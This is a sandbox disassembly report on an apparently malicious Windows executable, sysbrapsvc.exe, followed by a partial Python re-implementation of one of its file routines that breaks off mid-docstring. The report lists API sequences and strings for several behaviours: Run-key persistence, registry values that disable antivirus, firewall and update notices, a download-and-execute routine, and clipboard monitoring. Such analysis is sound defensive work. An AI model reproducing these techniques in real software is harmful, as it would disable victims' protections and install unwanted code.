                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                • String ID:
                                                                                • API String ID: 4174406920-0
                                                                                • Opcode ID: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                                                                • Instruction ID: ddf1df2f5e3c49f21769c3cd8a86baa6c810c68bf5de7ecead628d1f617bc177
                                                                                • Opcode Fuzzy Hash: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                                                                • Instruction Fuzzy Hash: 72319571A44301AFE320DF649C4AF9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                                                                APIs
                                                                                • htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AEF0: inet_addr.WS2_32(0040AF71), ref: 0040AEFA
                                                                                  • Part of subcall function 0040AEF0: gethostbyname.WS2_32(?), ref: 0040AF0D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                Strings
                                                                                • www.update.microsoft.com, xrefs: 0040AF67
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                • String ID: www.update.microsoft.com
                                                                                • API String ID: 4063137541-1705189816
                                                                                • Opcode ID: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction ID: 8d2b89a1e3841e6cd000a2b550c173cff20965c169263ef180e6ea1a6d777d84
                                                                                • Opcode Fuzzy Hash: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction Fuzzy Hash: D1213BB0E103099BCB04DFE8D946AEEBBB5AF08300F108169E504F7390E7745A44CBAA
                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(~@,00000000,00000000,00000001,F0000040,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C343
                                                                                • CryptGenRandom.ADVAPI32(~@,?,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C359
                                                                                • CryptReleaseContext.ADVAPI32(~@,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C365
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID: ~@
                                                                                • API String ID: 1815803762-592544116
                                                                                • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction ID: 830194fa38359529e853ee3f0456384099f2f8dd9552bb81b1528bc6e0449336
                                                                                • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction Fuzzy Hash: B3E01275654208BBDB24CFE1EC49FDA776CAB48B00F108154FB09D7190DAB5EA409BA8
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNELBASE(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                • String ID:
                                                                                • API String ID: 3943618503-0
                                                                                • Opcode ID: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                                                                • Instruction ID: 1e7a4891c1a42a5318b19a32161f2d9e989c632f85172a1bcc985bb178a8dbbc
                                                                                • Opcode Fuzzy Hash: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                                                                • Instruction Fuzzy Hash: 18119674A40710AFE3609F749C0AF877AE0AF04B14F50892DF699E62E1E2B49544878A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,b7x663937xa), ref: 0040751D
                                                                                • GetLastError.KERNEL32 ref: 00407529
                                                                                • ExitProcess.KERNEL32 ref: 00407538
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysbrapsvc.exe,00000105), ref: 00407572
                                                                                • PathFindFileNameW.SHLWAPI(C:\Windows\sysbrapsvc.exe), ref: 0040757D
                                                                                • wsprintfW.USER32 ref: 0040759A
                                                                                • DeleteFileW.KERNELBASE(?), ref: 004075AA
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                                                                • wcscmp.NTDLL ref: 004075D3
                                                                                • ExitProcess.KERNEL32 ref: 004075F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysbrapsvc.exe$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$b7x663937xa$sysbrapsvc.exe
                                                                                • API String ID: 4172876685-275362819
                                                                                • Opcode ID: aff6f25d3f8000eba581a1516f813dc5f7da4df36a577d5272a130dde58f2203
                                                                                • Instruction ID: 03a0cce086b07e6777eb00571f2894b6de511c4d2cf633d1374b0a1cea72e181
                                                                                • Opcode Fuzzy Hash: aff6f25d3f8000eba581a1516f813dc5f7da4df36a577d5272a130dde58f2203
                                                                                • Instruction Fuzzy Hash: D64256B1B80318BBE7209BA0DC4AFD93779AB48B11F10C5A5F305BA1D0DAF5A584CB5D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040EF99
                                                                                • srand.MSVCRT ref: 0040EFA0
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EFC0
                                                                                • strlen.NTDLL ref: 0040EFCA
                                                                                • mbstowcs.NTDLL ref: 0040EFE1
                                                                                • rand.MSVCRT ref: 0040EFE9
                                                                                • rand.MSVCRT ref: 0040EFFD
                                                                                • wsprintfW.USER32 ref: 0040F024
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F03A
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F069
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F098
                                                                                • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F0CB
                                                                                • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0040F0FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F10B
                                                                                • wsprintfW.USER32 ref: 0040F124
                                                                                • DeleteFileW.KERNELBASE(?), ref: 0040F134
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F13F
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040F160
                                                                                • ExitProcess.KERNEL32 ref: 0040F188
                                                                                • DeleteFileW.KERNELBASE(?), ref: 0040F19E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F1AB
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1B8
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1C5
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F1D0
                                                                                • rand.MSVCRT ref: 0040F1E5
                                                                                • Sleep.KERNELBASE ref: 0040F1FC
                                                                                • rand.MSVCRT ref: 0040F202
                                                                                • rand.MSVCRT ref: 0040F216
                                                                                • wsprintfW.USER32 ref: 0040F23D
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 0040F24D
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F267
                                                                                • wsprintfW.USER32 ref: 0040F287
                                                                                • DeleteFileW.KERNELBASE(?), ref: 0040F297
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F2A2
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F2C3
                                                                                • ExitProcess.KERNEL32 ref: 0040F2EA
                                                                                • DeleteFileW.KERNELBASE(?), ref: 0040F2F9
                                                                                Strings
                                                                                • %temp%, xrefs: 0040EFBB
                                                                                • %s:Zone.Identifier, xrefs: 0040F27B
                                                                                • %s:Zone.Identifier, xrefs: 0040F118
                                                                                • %s\%d%d.exe, xrefs: 0040F231
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F035
                                                                                • %s\%d%d.exe, xrefs: 0040F018
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 3526668077-2417596247
                                                                                • Opcode ID: 8fcd0f09372c00a3cbb61bbde4d05531ec90484324228f58d9270ea4f8841c2f
                                                                                • Instruction ID: 8d9dde5e83d6f5576f0fa95dcda068e4d807ca32b5c879c9ce831b2193034ea7
                                                                                • Opcode Fuzzy Hash: 8fcd0f09372c00a3cbb61bbde4d05531ec90484324228f58d9270ea4f8841c2f
                                                                                • Instruction Fuzzy Hash: 7D91EBB5940318ABE720DB50DC49FEA3379AF88701F0485B9F609A51C1DABD9AC8CF59

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040B280: gethostname.WS2_32(?,00000100), ref: 0040B29C
                                                                                  • Part of subcall function 0040B280: gethostbyname.WS2_32(?), ref: 0040B2AE
                                                                                • strcmp.NTDLL ref: 0040B380
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynamegethostnamestrcmp
                                                                                • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                • API String ID: 2906596889-2213908610
                                                                                • Opcode ID: a84fc12e8fb4865d36b1ea06ef6f0599483274ee2da903410dbdfc319e881692
                                                                                • Instruction ID: 1e2a78016ab808788e4a3d10fbde234ca2a84306dd4339bbdfb36d09265cce6e
                                                                                • Opcode Fuzzy Hash: a84fc12e8fb4865d36b1ea06ef6f0599483274ee2da903410dbdfc319e881692
                                                                                • Instruction Fuzzy Hash: C76171B5940305A7DB00AB61EC46BAA3765AB10318F18847AFC05673C2F77DE664C6DF

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                                • SetClipboardViewer.USER32(?), ref: 00405968
                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                                • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                                • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                                • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                                • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                • String ID:
                                                                                • API String ID: 3549449529-0
                                                                                • Opcode ID: e0897a1c01658654bab4c30dd7d4a59a874db33c96eaa3b8bfa9dc0d479b6fc4
                                                                                • Instruction ID: ab6473899f09a2e4ce72b89913391a8d882f42dafbfb3729ae4d66df8233a766
                                                                                • Opcode Fuzzy Hash: e0897a1c01658654bab4c30dd7d4a59a874db33c96eaa3b8bfa9dc0d479b6fc4
                                                                                • Instruction Fuzzy Hash: 6671FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00406B5E
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysbrapsvc.exe,00000104), ref: 00406B70
                                                                                  • Part of subcall function 0040EC20: CreateFileW.KERNELBASE(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                  • Part of subcall function 0040EC20: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                  • Part of subcall function 0040EC20: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040EC62
                                                                                • ExitThread.KERNEL32 ref: 00406CDA
                                                                                  • Part of subcall function 00406340: GetLogicalDrives.KERNELBASE ref: 00406346
                                                                                  • Part of subcall function 00406340: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                  • Part of subcall function 00406340: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                  • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00406CCD
                                                                                  • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                                                                • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                                                                • wsprintfW.USER32 ref: 00406C52
                                                                                • wsprintfW.USER32 ref: 00406C72
                                                                                • wsprintfW.USER32 ref: 00406C95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filewsprintf$CloseSleep$ChangeCreateDiskDrivesExitFindFreeInformationLogicalModuleNameNotificationOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                • String ID: (%dGB)$%s%s$C:\Windows\sysbrapsvc.exe$Unnamed volume
                                                                                • API String ID: 899515741-3911162851
                                                                                • Opcode ID: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction ID: 453264953970db4b87c24ab6cdbfc4a104d47f91dccd03b52bb95ce70ceb3e7a
                                                                                • Opcode Fuzzy Hash: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction Fuzzy Hash: E041A9B1940218BBE714DB94DD55FEE7378BB48700F0081BAF20AB61D0DA785B94CF6A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 00405838
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                                • Sleep.KERNELBASE(00000001), ref: 00405864
                                                                                • GetTickCount.KERNEL32 ref: 0040586A
                                                                                • GetTickCount.KERNEL32 ref: 00405873
                                                                                • wsprintfW.USER32 ref: 00405886
                                                                                • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                                • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                                • TranslateMessage.USER32(?), ref: 004058E5
                                                                                • DispatchMessageA.USER32(?), ref: 004058EF
                                                                                • ExitThread.KERNEL32 ref: 00405901
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                • String ID: %x%X$0
                                                                                • API String ID: 716646876-225668902
                                                                                • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction ID: f3e1014eb48ffaf448ebc99f6ba60d6258e7c56012e586919e9efecad1237f6d
                                                                                • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction Fuzzy Hash: BB211A71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                                                                Control-flow Graph
                                                                                (graph image not reproduced; basic blocks 40ec70-40ee2a, internal calls to 40a660, 40a990, 40c640, 40cca0)
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ECA2
                                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040ECC3
                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040ECE2
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ECFB
                                                                                • memcmp.NTDLL ref: 0040ED8D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EDB0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040EDBA
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EDC4
                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EDE3
                                                                                • WriteFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 0040EE08
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EE12
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                • String ID:
                                                                                • API String ID: 3902698870-0
                                                                                • Opcode ID: c771612281c407a2c0136b61b2377c082ab1d65baf527ffd144ccb78ffcbf32e
                                                                                • Instruction ID: 32b63ebe374edb734f10ceafdcfe6a9e739b08b32ae31a868bafe8a6799fa03f
                                                                                • Opcode Fuzzy Hash: c771612281c407a2c0136b61b2377c082ab1d65baf527ffd144ccb78ffcbf32e
                                                                                • Instruction Fuzzy Hash: 20514EB4E40209FBDB14DFA4CC49BDEB774AB48704F108569E611B72C0D7B9AA40CB98
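The routine at 0x40ec70 opens a file with CreateFileW(GENERIC_READ = 0x80000000, OPEN_EXISTING = 3), maps it with CreateFileMappingW(PAGE_READONLY = 2) and MapViewOfFile(FILE_MAP_READ = 4), reads its size, compares the view with memcmp, unmaps and closes, and on one path reopens the file with CreateFileW(GENERIC_WRITE = 0x40000000, CREATE_ALWAYS = 2) and writes it. The Python below re-implements that map/compare/rewrite sequence so an analyst can test the hypothesis against a file on disk; it is an added example written for this report, not code from the sample or from Joe Sandbox. The constant names are the Windows SDK meanings of the argument values in the dump; the file name in demo() is hypothetical, and letting the compare result drive the write is an assumption (the branch at 0x40edca may instead depend on state set by the helper at 0x40a660, which the dump does not show).

```python
"""Analyst re-implementation of the map/compare/rewrite sequence at 0x40ec70
(added example, not sample code)."""
import mmap
import os
import tempfile
from typing import List, Optional

# Argument values from the dump, decoded against the Windows SDK definitions:
GENERIC_READ  = 0x80000000   # CreateFileW dwDesiredAccess at 0040ECA2
GENERIC_WRITE = 0x40000000   # CreateFileW dwDesiredAccess at 0040EDE3
OPEN_EXISTING = 0x00000003   # dwCreationDisposition at 0040ECA2: fail if the file is absent
CREATE_ALWAYS = 0x00000002   # dwCreationDisposition at 0040EDE3: create, or truncate an existing file
PAGE_READONLY = 0x00000002   # CreateFileMappingW flProtect at 0040ECC3
FILE_MAP_READ = 0x00000004   # MapViewOfFile dwDesiredAccess at 0040ECE2


def file_matches(path: str, expected: bytes) -> Optional[bool]:
    """Open `path` read-only, map it, and memcmp the view against `expected`.

    Returns None when the file cannot be opened (the CreateFileW failure edge
    that skips straight to 0x40edca), otherwise the memcmp outcome. Steps follow
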